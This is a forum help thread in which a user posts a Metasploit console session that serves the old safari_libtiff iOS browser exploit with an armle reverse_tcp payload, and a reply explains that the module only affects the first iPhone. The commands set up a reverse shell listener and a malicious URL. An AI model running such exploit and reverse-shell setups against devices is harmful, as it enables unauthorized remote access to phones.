I have been trying to get remote access to my iPhone using Metasploit version 4.16.42-dev.
I have been using "exploit/apple_ios/browser/safari_libtiff"
and payload "osx/armle/execute/reverse_tcp".
I have been using my internal IP... I tried to use an ngrok external IP once; then the link was successfully opened and the session was created, but the handler could not connect, and the session was also immediately closed with an error.
This is what I have been doing...
msf > use exploit/apple_ios/browser/safari_libtiff
msf exploit(safari_libtiff) > set URIPATH /ipwn
URIPATH => /ipwn
msf exploit(safari_libtiff) > set PAYLOAD osx/armle/execute/reverse_tcp
PAYLOAD => osx/armle/execute/reverse_tcp
msf exploit(safari_libtiff) > set LHOST xxx.xxx.x.xxx
LHOST => xxx.xxx.x.xxx
msf exploit(safari_libtiff) > set LPORT 4444
LPORT => 4444
msf exploit(safari_libtiff) > exploit
Started reverse handler
Using URL: 0.0.0.0:8080/ipwn
Local IP: xxxx.xxx.x.xxx:8080/ipwn
Server started.
* Exploit running as background job.
msf exploit(safari_libtiff) >
Expected behavior
When the URL is opened in the Safari browser, it should create a session that I can interact with.
Current behavior
What happens instead is that the link cannot be opened in the Safari browser on my iPhone, and the session is therefore not created.
System stuff
Metasploit version 4.16.42-dev
OS
Kali Linux
2 Responses
The problem is that exploit is not what you think it is. It's a super old exploit that only works on the original iPhone, version 1. There is currently no way to get remote access to an iPhone unless you create a backdoor iOS application, jailbreak the iPhone, and then install the app. Or you get extremely lucky and find a remote code execution vulnerability that you could exploit.
Thank you TREVELLER, I have been testing it on iOS 7.1.0. Does eggshell work for remote access on iOS?